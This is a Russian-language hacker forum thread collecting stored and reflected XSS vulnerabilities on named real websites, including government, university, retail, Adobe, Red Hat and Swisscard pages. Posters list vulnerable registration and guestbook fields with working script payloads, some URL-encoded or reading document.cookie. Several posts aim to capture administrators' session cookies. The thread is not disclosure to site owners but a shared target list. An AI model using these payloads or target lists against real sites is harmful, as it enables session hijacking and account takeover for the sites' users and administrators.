Хранимые XSS

xss

netprint.ru

Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>

Укладываемся в 40 символов.

 

ЛЕНТА - сеть гипермаркетов

Code:

http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>

 

Ошибся разделом, это пассивная

 

Разобрался

 

http://nsti.ru/guest/

Гостевая книга

Добавляем во все формы: "onmouseover="alert('xss')"

 

Code:

www.miem.edu.ru

Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.

Code:

http://www.econ.msu.ru/

Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя

Code:

http://www.rapway.com.ru/

Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт

Code:

www.saletime.biz

Гостевая книга. Уязвимо поле: Имя

Code:

http://livemy.info

Регистрируемся, идем в раздел "События", уязвимое поле - описание события.

Code:

http://blog.inf.by

Регистрируемся, уязвимое поле: Название блога

Че-то пост разросся =)

 

Верховная Рада Украины =)

Code:

http://portal.rada.gov.ua 

Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)

 

Adobe.com

регимся здесь

Code:

https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus

при регистрации вставляем в любое поле
<script>alert(12121)</script>

кроме e-mail, password, zip-code...

заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф

 

http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė

 

www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)

 

это в пассивные xss

 

www.fanat.com.ua
Украинские фанаты футбола

Code:

http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22

 

1. Это пассивная.
2. Сообщение в алерте нуждается в одинарных кавычках.

 

это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать

 

http://www.rabotnitsa.ru/guestbook.php
сайт журнала работница уязвимые поля емейл, автор

 

Форум сертифицированных специалистов

http://www.certification.ru

В добавляемое сообщение вставляем:

И ждём, когда к нам в гости прилетят админские кукизы.

 

REDHAT

Code:

https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

SWISS CARD

Code:

http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

AND

PAYPAL SUCKS

Code:

http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

EDIT:


here is wrong place...sorry ppl

 

libra.kiev.ua/list_lyr.php?show_id=6578&page=1


в поле эмайл вводим '"><script>alert('Хss')</script>

 

http://playboy.com.ru/stat/se.php
активная ксс на официальном российском сайте суперпопулярного плейбоя
описание тут:
https://forum.antichat.ru/thread55136.html

 

http://www.babki.net/search.php
в поисковике товаров введите <script>alert('Mike 007 rulezz ')</script>